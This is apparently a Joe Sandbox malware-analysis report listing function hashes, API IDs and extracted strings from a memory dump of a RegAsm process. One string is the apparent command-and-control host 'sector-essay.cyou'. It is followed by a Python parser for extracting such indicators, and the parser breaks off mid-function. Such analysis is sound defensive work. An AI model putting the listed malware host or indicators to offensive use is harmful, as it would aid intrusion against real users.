                          • Opcode ID: db5356a85bfc6720e611b1c4f7cda29c597fe52265ba8501f91eb5461658473a
                          • Instruction ID: 48eca17094e2952ee5b1522901b7380c2bd319ec7efd6ff3a64039dacec39483
                          • Opcode Fuzzy Hash: db5356a85bfc6720e611b1c4f7cda29c597fe52265ba8501f91eb5461658473a
                          • Instruction Fuzzy Hash: 1E51E5B1908B828BD714AF7C984926EFFA0AB56321F04873ED4E5873C2D3389555C797
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: /X$HY$M_$nqN$SQ$W%U$_]
                          • API String ID: 0-922328653
                          • Opcode ID: adaf769dc07baa925b36d48b2974999ebd7d222f5462be74a140492f6f4a0a71
                          • Instruction ID: 9d35cec4eb88c975eaced11c3f356054b61f51290990f0a469af967a64148600
                          • Opcode Fuzzy Hash: adaf769dc07baa925b36d48b2974999ebd7d222f5462be74a140492f6f4a0a71
                          • Instruction Fuzzy Hash: F6C1057564C3848BD3248F2584A136BFBE2EBD1314F28C97EE8D51B381D7798805CB8A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: Gz~A$OOuH${BGy
                          • API String ID: 3664257935-673351052
                          • Opcode ID: 2a2c75dbf13ae53032da221de794be44316f2d1803b24fa489eba0d92d53847f
                          • Instruction ID: b4afd5d696ae46a79715fd04e902fb47bd62efa5cd512110a86a1c3d2419befd
                          • Opcode Fuzzy Hash: 2a2c75dbf13ae53032da221de794be44316f2d1803b24fa489eba0d92d53847f
                          • Instruction Fuzzy Hash: A09148717047418BE3258B3588817A3BBD2EFA2314F188A2ED4EB4B7C2D779B815C759
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: 0$rr3w$rr3w
                          • API String ID: 2525500382-585071120
                          • Opcode ID: e0d49dbfc58d60801ceb0d0a0c33fd01609994a53ada82c5faa9c820f58f335f
                          • Instruction ID: 6016c376eef58914c36b6832e60878505128e2830f523d5165e2a9528a75c50c
                          • Opcode Fuzzy Hash: e0d49dbfc58d60801ceb0d0a0c33fd01609994a53ada82c5faa9c820f58f335f
                          • Instruction Fuzzy Hash: 94C12B71108FC18AD332CA3888887D3BFD16B66324F084A6DD1FA8B6D2D2B96145C766
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: "onm$HK$R/A)$X?s9$v
                          • API String ID: 0-4191733568
                          • Opcode ID: 7257a3a036ce90b6866de9d76ed6032abfb4af58a26d17f0dd13f744aa4c2c9b
                          • Instruction ID: bb70e7f2f821a34659c7e6a6e036051f756378a1106bb9181ebdcbed6fe89c1f
                          • Opcode Fuzzy Hash: 7257a3a036ce90b6866de9d76ed6032abfb4af58a26d17f0dd13f744aa4c2c9b
                          • Instruction Fuzzy Hash: D412BCB56093818BC738CF24C8A57EBBBE1FF96304F08896DD4C98B295E7784545CB86
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ;:=<$Ny$bq$zj${`
                          • API String ID: 0-427255626
                          • Opcode ID: 4b8c90023f8c7e2326e5dee30178ce67bafacd6039eb097d48a4d42b6b4c4679
                          • Instruction ID: 9600335381a4ad5a763fe039fa12eb1047036e882436e7c8ea96b07542593d7b
                          • Opcode Fuzzy Hash: 4b8c90023f8c7e2326e5dee30178ce67bafacd6039eb097d48a4d42b6b4c4679
                          • Instruction Fuzzy Hash: D1E137B5A04206CFDB14CF69DC81A6EBBB2FF55304F5880A9E541AB362D734E942CF94
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: -y{$5697ED7B3A758717FEE815EB403F5D54$X$XY$t|z
                          • API String ID: 0-3916512585
                          • Opcode ID: 71929b7cb78fade234d0af0284fb1bbfe974b8de8f9b96e23177f78a23c85248
                          • Instruction ID: 6d1683724e37c284d1767b87699e3bd02a350b4874d110cad8f44bb5add2a7dd
                          • Opcode Fuzzy Hash: 71929b7cb78fade234d0af0284fb1bbfe974b8de8f9b96e23177f78a23c85248
                          • Instruction Fuzzy Hash: 50C124716083808BE318DF35C85576BBBE5EBD1314F188A2DE5D69B392CB38C905CB86
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: FX_M$P@EZ$aHXN$}PSU$}PSU}PSU}PSU}PSU
                          • API String ID: 0-3769906081
                          • Opcode ID: f45f3dab8cab5d2951a74eecad4c86154023a0410c5b8fb2b397da8f807a4f8b
                          • Instruction ID: cdf010998d352b622df295b76928b5259ab787b9826e66f06dd73327f37ace46
                          • Opcode Fuzzy Hash: f45f3dab8cab5d2951a74eecad4c86154023a0410c5b8fb2b397da8f807a4f8b
                          • Instruction Fuzzy Hash: 8BE12775E04251CFDB04CF68D8907ADBBB2AF4A314F2982A9D8146B3E2C7759D02CB94
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: D}$Sp$S~$X_$sB
                          • API String ID: 0-2074769466
                          • Opcode ID: b3d578ceabb7e91782cd02d317d1b7f3f2e96c6f2b729bc3cad980b6991a411d
                          • Instruction ID: 764fa7655f74a2f121e6bca1a8d7645511b336d90907924af72623d28470fcdf
                          • Opcode Fuzzy Hash: b3d578ceabb7e91782cd02d317d1b7f3f2e96c6f2b729bc3cad980b6991a411d
                          • Instruction Fuzzy Hash: 3F5101B02083908BD7109F25E89266BBBF0FF92364F054A1DF5D58B391E7788905CB9B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 6/JT$;:=<$D/JT$FTGN
                          • API String ID: 0-2223222905
                          • Opcode ID: b30fec8d57be68d97ecf87f983db9025c2b0b2ba739a92f5e0b606a5f2878763
                          • Instruction ID: 8a88c06ab80c316f3aeb94003148513e405f01649903baca4afcd5b0dd57d601
                          • Opcode Fuzzy Hash: b30fec8d57be68d97ecf87f983db9025c2b0b2ba739a92f5e0b606a5f2878763
                          • Instruction Fuzzy Hash: E6D1AB75E00160CFCB14CF68D8517AEBBB2BF0A300F1A41ADE9516B392D7395D15CB9A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: O[M@$T(F&$UKKX$j
                          • API String ID: 0-1885386310
                          • Opcode ID: 97e84a6f11231ccd1c36d43f8651d917bf6311de1855abfe1527903d33f6c9e4
                          • Instruction ID: 6cf50836299448d37242e0f92cc58f33f00555e081f2aa65baf5a2ec525ff5bb
                          • Opcode Fuzzy Hash: 97e84a6f11231ccd1c36d43f8651d917bf6311de1855abfe1527903d33f6c9e4
                          • Instruction Fuzzy Hash: 1061B06014D3C18AD3118F2980E076BFFE0EFA7314F1845AEE8D55B382C779891ADB66
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: At$VlVk$]]EX$^d^c
                          • API String ID: 0-2893682494
                          • Opcode ID: 937370a5f1a352b7117d604bb765efe6b8bee1564d4b1c3b5f93a126cadb7364
                          • Instruction ID: e408b536d8ea96a86f5c1d16ea42e08b2438d6e83c22bfc62619355d171567df
                          • Opcode Fuzzy Hash: 937370a5f1a352b7117d604bb765efe6b8bee1564d4b1c3b5f93a126cadb7364
                          • Instruction Fuzzy Hash: 698116B5508380CBE331AB24D8527EB77E1EF96308F04093DE5D887292E7794955CB5B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: D@$I^$Md
                          • API String ID: 0-4131734681
                          • Opcode ID: 4de84d16cd981aaefb993032dad4d1a30dacd358b2f0ceeccfcd92a9c5c60521
                          • Instruction ID: f0b977693b76beac5d1a3dbdc409a79a56d24bbcd65843350be76cf5f517929c
                          • Opcode Fuzzy Hash: 4de84d16cd981aaefb993032dad4d1a30dacd358b2f0ceeccfcd92a9c5c60521
                          • Instruction Fuzzy Hash: 29A13875E002258BCF24CFA8C8917AB77B1FF45314F19816ED896AF395EB384941CB45
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: (+$fM.$KE
                          • API String ID: 0-2816184506
                          • Opcode ID: 4dc242b38a8d5bc5b7508cac9f95328175687f110da05bd0eedfc5c179a4f52f
                          • Instruction ID: 8f53063ee58306ac1f2b9de81cb91a000338831b88c2d8f9006311080da09921
                          • Opcode Fuzzy Hash: 4dc242b38a8d5bc5b7508cac9f95328175687f110da05bd0eedfc5c179a4f52f
                          • Instruction Fuzzy Hash: A57105B6E04214DFDB04CF64DC817AEBB72FF89310F1A4169E9046B395DB759812CB84
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,"O$";$kfgk
                          • API String ID: 0-2346484820
                          • Opcode ID: aa9dedc1418fa798ad7630c511284e1a8f14e1ad3b7c790f528e686ce717650e
                          • Instruction ID: 7540dbb34f0aab74f8b3e3bae81456e2250203a5ca1ab448a2fd284ffa4cb292
                          • Opcode Fuzzy Hash: aa9dedc1418fa798ad7630c511284e1a8f14e1ad3b7c790f528e686ce717650e
                          • Instruction Fuzzy Hash: F15109B1205B908AC7268F36C4A03A7BBE2AF97214F9985AED5D74B347CB385406C718
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: Y3@x$k "#$sector-essay.cyou
                          • API String ID: 0-1819320278
                          • Opcode ID: 1465832e7b58c4371a415bda3dc569beca77767b6d3a97be0d770cbfadde0780
                          • Instruction ID: e4bedc7c66ef88fb73c058dd61637da2bfc25202fb332dbb219011eaf45d0d7a
                          • Opcode Fuzzy Hash: 1465832e7b58c4371a415bda3dc569beca77767b6d3a97be0d770cbfadde0780
                          • Instruction Fuzzy Hash: 2BF0B4742083409FD7889F24DCD173BB7A2DB82304F54992DA182D32D2CBB9D806CF09
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: DrivesLogical
                          • String ID: I=[;
                          • API String ID: 999431828-61854675
                          • Opcode ID: 6c59a45d7981fb6276eb4f0010b5d109190027263947946e3bee6ad9e4217679
                          • Instruction ID: fdd2558837e3522963ad8216888f43651256edf83e2524651161abf3b8abf33e
                          • Opcode Fuzzy Hash: 6c59a45d7981fb6276eb4f0010b5d109190027263947946e3bee6ad9e4217679
                          • Instruction Fuzzy Hash: 2A9143B1A00215CFDB14CFA9EC926AEBBB1FF85318F1585A9D451AF362D3389901CF58
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: /.-,$f
                          • API String ID: 2994545307-268397193
                          • Opcode ID: 267390c10bd30d36a8619fe02524233a6dad70afb1cee84af233b9d0527f0f5f
                          • Instruction ID: d2b16895bd0021cb106197b5681fe6ffe89d9511de6163e5f169a64b9c0f981f
                          • Opcode Fuzzy Hash: 267390c10bd30d36a8619fe02524233a6dad70afb1cee84af233b9d0527f0f5f
                          • Instruction Fuzzy Hash: D622E2756083018FC714CF29C8D1A6BBBE2ABC9314F289A2EF4D197391D779D845CB4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ($^
                          • API String ID: 0-2972045208
                          • Opcode ID: a12676f9734d6a0a0bda6de865abc1a24d6cd79b0e11a44953e3c6254b2bc331
                          • Instruction ID: 2f598e9537973fb736bad82c5bd561de69ae8d1b02f69733910a915f7e0cb602
                          • Opcode Fuzzy Hash: a12676f9734d6a0a0bda6de865abc1a24d6cd79b0e11a44953e3c6254b2bc331
                          • Instruction Fuzzy Hash: 1AF110741083418FD725CF29C8A57ABBBE1FF86314F18886DD4C98B292D7399846CB57
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: )$IEND
                          • API String ID: 0-707183367
                          • Opcode ID: 863a25de8cdc3a3279ca3097fa1484c5a50e6d75e7e334b4f08c48651f5ec0e5
                          • Instruction ID: ecb30bbfc98707852728fca67ccd6cc89ad65581e2d14f423743e414cef4b987
                          • Opcode Fuzzy Hash: 863a25de8cdc3a3279ca3097fa1484c5a50e6d75e7e334b4f08c48651f5ec0e5
                          • Instruction Fuzzy Hash: 17E1B0B1A087019FD310DF29D84471BBBE4BB94308F14493EF994AB382E779E915CB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \eQZ$vT^4
                          • API String ID: 0-3607082246
                          • Opcode ID: 1f3e988b4aa76ab3f687d6e92620ed6dbf5d3dd5c00552b95ddbbb4f4ead08ee
                          • Instruction ID: 3b057a2223dc50d3023ddf38fb8fa413fa556e3f3f3c85b146c5146a78224abf
                          • Opcode Fuzzy Hash: 1f3e988b4aa76ab3f687d6e92620ed6dbf5d3dd5c00552b95ddbbb4f4ead08ee
                          • Instruction Fuzzy Hash: 3AA1B6707047918FE3258B36D4617B3BBE2AF52304F59896ED0EB87381D779A4098B16
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \eQZ$vT^4
                          • API String ID: 0-3607082246
                          • Opcode ID: 17271100e52e72446431b4ba25b522317e322b2cd0d75d0d208a158024b20060
                          • Instruction ID: e5b8c5e402a2ca9d81720aa6e2d634f6837bebe6097875f4b01a460d8e1aebeb
                          • Opcode Fuzzy Hash: 17271100e52e72446431b4ba25b522317e322b2cd0d75d0d208a158024b20060
                          • Instruction Fuzzy Hash: 1BA1C4707047918FE3258B36D4617B3BBE2AF52304F59896ED0EB87381D779A4098B16
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \eQZ$vT^4
                          • API String ID: 0-3607082246
                          • Opcode ID: 3ec17b83a0cfc1261a6730cc03ff32b26a3bccff8d2e7f5fcc69799121595fee
                          • Instruction ID: 626986f943cacfe7cdee8c514adc803c7eed872e390f7135a9fdb6cd9b05e1ff
                          • Opcode Fuzzy Hash: 3ec17b83a0cfc1261a6730cc03ff32b26a3bccff8d2e7f5fcc69799121595fee
                          • Instruction Fuzzy Hash: C491B470604B908FE325CF36D4517B3BBE2AF53304F59896ED0EB87681D739A4098B26
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \$dY
                          • API String ID: 0-3471542007
                          • Opcode ID: 7acb568cdc52ecc74af97a4787a3a3ad331d2af1e24d79d5e469179ee0ab82e4
                          • Instruction ID: 03c21bf36d51f01782684134e1a7ec2c5429c0a6a87f8c6afb469a8b13a2632c
                          • Opcode Fuzzy Hash: 7acb568cdc52ecc74af97a4787a3a3ad331d2af1e24d79d5e469179ee0ab82e4
                          • Instruction Fuzzy Hash: BB7187B2A443018FD718CF24C88179ABFB2FB46314F5A82ADE4525F391C7758486CBC5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: GU$P
                          • API String ID: 0-4264775118
                          • Opcode ID: f4b5ae4fce804300cc27d76100c5c2827f7801721f25e97db71a1ee733bdee20
                          • Instruction ID: 9765230f43f6f534d29c8484abfaa169658ff9908dd3c8eb9dc5dbdfa9da3dfc
                          • Opcode Fuzzy Hash: f4b5ae4fce804300cc27d76100c5c2827f7801721f25e97db71a1ee733bdee20
                          • Instruction Fuzzy Hash: 275102B44083518BD718CF25C4913ABBBF0EF96364F044A1DE4D58B291E37C8946CB9B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: bD
                          • API String ID: 0-341964956
                          • Opcode ID: f8624cd08b5e62a9b1cbd92fd9fb648ac32dbaed00b84c83359fa603dc2c8329
                          • Instruction ID: 797598d5b798d05eb88edb43405c4c1f0413fb6f14aefd465af797d458563e3a
                          • Opcode Fuzzy Hash: f8624cd08b5e62a9b1cbd92fd9fb648ac32dbaed00b84c83359fa603dc2c8329
                          • Instruction Fuzzy Hash: 35422339A48351CFD704CF28D8902AAB7F1FB8A324F1A887DD98587351D738D955CB86
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: "BB
                          • API String ID: 0-2652194471
                          • Opcode ID: d02e0a206807257a0ad29544d9084e13304aeda90ad91bad4d34b989897f1b57
                          • Instruction ID: f433d89746e8063d1265eb30f93065ad954c5b9ac59068488884f58db9b4ec75
                          • Opcode Fuzzy Hash: d02e0a206807257a0ad29544d9084e13304aeda90ad91bad4d34b989897f1b57
                          • Instruction Fuzzy Hash: 8C42E276B04116CFDB08CF68EC917AEB7B2FB8A310F1981B8E511A7391D774A851CB94
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: |}
                          • API String ID: 0-2241360599
                          • Opcode ID: 46c5b9ddc5b99c63ac287f401b6f8556ddc808f31fd7f0323445c414bf22c29c
                          • Instruction ID: f9c2e87604e5b9b62a4ee05c4a3bcffcae0d3c1aa8820bb697bee025421a49ce
                          • Opcode Fuzzy Hash: 46c5b9ddc5b99c63ac287f401b6f8556ddc808f31fd7f0323445c414bf22c29c
                          • Instruction Fuzzy Hash: BB3246B5A00606CFCB14CF65C8922FBBBB1FF56310F18866DD8559B381E338A981CB95
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: bD
                          • API String ID: 0-341964956
                          • Opcode ID: e99359dc99a8bf858c3b7c63ae7db808fb00536d9867249c0ed49bce75a1a9b6
                          • Instruction ID: 911d2f89f39eaf0008d7b756394c97734fafba8bae24048753eae8f52f09a2ab
                          • Opcode Fuzzy Hash: e99359dc99a8bf858c3b7c63ae7db808fb00536d9867249c0ed49bce75a1a9b6
                          • Instruction Fuzzy Hash: 3A022139A48211CFD704CF28D8906AAB7E2FF8A310F0A897DD98587351D738DC55CB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: bD
                          • API String ID: 0-341964956
                          • Opcode ID: 04e2cddd21c82fc03b3f98c5b853d8b90686f0363848fa8e347febc4d9bcb0a9
                          • Instruction ID: d62e37b0ccf4a74103ea6b78b2ff9ea56fd3d2c5454dac3654949ab233673ec3
                          • Opcode Fuzzy Hash: 04e2cddd21c82fc03b3f98c5b853d8b90686f0363848fa8e347febc4d9bcb0a9
                          • Instruction Fuzzy Hash: C1022F39A48311CFDB04CF38D8906AAB7E2EF8A314F0A897DD98587351D738D855CB96
                          APIs
                          • CoCreateInstance.OLE32(00443598,00000000,00000001,00443588), ref: 00423619
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID:
                          • API String ID: 542301482-0
                          • Opcode ID: f7b2f4b760a81e6f9b6e5f6b2e8cc5017b6c2693f137bd3191b76f93f8daa911
                          • Instruction ID: 7ddeebd1315078c88221df5178ba7910bcfe2ee1bb9768e595efda2fedcb572e
                          • Opcode Fuzzy Hash: f7b2f4b760a81e6f9b6e5f6b2e8cc5017b6c2693f137bd3191b76f93f8daa911
                          • Instruction Fuzzy Hash: 5151CEB0700214ABDB20AF24DC86B7733B8EF8575AF448559F9858B390E37CDA01C76A
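The records above are the Joe Sandbox IDA Plugin's per-function metadata, and one of them carries a host name in its String ID (sector-essay.cyou) while another carries a resolved API call (CoCreateInstance.OLE32). A practitioner usually wants those pulled out of the rendered text: host-name strings as indicators, API IDs and fuzzy hashes for pivoting to similar functions in other samples. The following is an added example and is not part of the report or of Joe Sandbox; it parses the record layout exactly as it is rendered on this page. The two sample records are copied from this section, the field names are the ones the report prints, and the host-name regex, the `$` string separator and the "api hash-string hash" reading of API String ID are assumptions of the example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample input: two function records copied verbatim from the report text.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Similarity
• API ID:
• String ID: Y3@x$k "#$sector-essay.cyou
• API String ID: 0-1819320278
• Opcode ID: 1465832e7b58c4371a415bda3dc569beca77767b6d3a97be0d770cbfadde0780
• Instruction ID: e4bedc7c66ef88fb73c058dd61637da2bfc25202fb332dbb219011eaf45d0d7a
• Opcode Fuzzy Hash: 1465832e7b58c4371a415bda3dc569beca77767b6d3a97be0d770cbfadde0780
• Instruction Fuzzy Hash: 2BF0B4742083409FD7889F24DCD173BB7A2DB82304F54992DA182D32D2CBB9D806CF09
APIs
• CoCreateInstance.OLE32(00443598,00000000,00000001,00443588), ref: 00423619
Memory Dump Source
• Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
• Opcode ID: f7b2f4b760a81e6f9b6e5f6b2e8cc5017b6c2693f137bd3191b76f93f8daa911
• Instruction ID: 7ddeebd1315078c88221df5178ba7910bcfe2ee1bb9768e595efda2fedcb572e
• Opcode Fuzzy Hash: f7b2f4b760a81e6f9b6e5f6b2e8cc5017b6c2693f137bd3191b76f93f8daa911
• Instruction Fuzzy Hash: 5151CEB0700214ABDB20AF24DC86B7733B8EF8575AF448559F9858B390E37CDA01C76A
"""

# Field names as the report prints them; "Instruction Fuzzy Hash" closes every record.
FIELDS = {
    "Source File", "Snapshot File", "API ID", "String ID", "API String ID",
    "Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash",
}
LAST_FIELD = "Instruction Fuzzy Hash"
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Assumption: "API String ID" is "<api hash>-<string hash>", with 0 for an empty side.
API_STRING_RE = re.compile(r"^(\d+)-(\d+)$")
# Assumption: a host name is two or more dot-separated labels with no spaces.
HOSTNAME_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.IGNORECASE)


@dataclass
class FunctionRecord:
    fields: dict[str, str] = field(default_factory=dict)
    api_calls: list[str] = field(default_factory=list)  # resolved calls listed under "APIs"

    @property
    def strings(self) -> list[str]:
        # The report joins a function's strings with "$"; a string that itself
        # contains "$" cannot be recovered from this rendered view.
        raw = self.fields.get("String ID", "")
        return [s for s in raw.split("$") if s]

    @property
    def api_ids(self) -> list[str]:
        raw = self.fields.get("API ID", "")
        return [s for s in raw.split("$") if s]

    @property
    def hashes(self) -> tuple[int, int]:
        m = API_STRING_RE.match(self.fields.get("API String ID", ""))
        return (int(m.group(1)), int(m.group(2))) if m else (0, 0)

    def hostnames(self) -> list[str]:
        return [s for s in self.strings if HOSTNAME_RE.match(s)]


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the rendered report text into one FunctionRecord per function."""
    records: list[FunctionRecord] = []
    current = FunctionRecord()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        key, sep, value = line.partition(":")
        if sep and key in FIELDS:
            current.fields[key] = value.strip()
            if key == LAST_FIELD:          # record complete, start the next one
                records.append(current)
                current = FunctionRecord()
        elif section == "APIs":            # e.g. "CoCreateInstance.OLE32(...), ref: 00423619"
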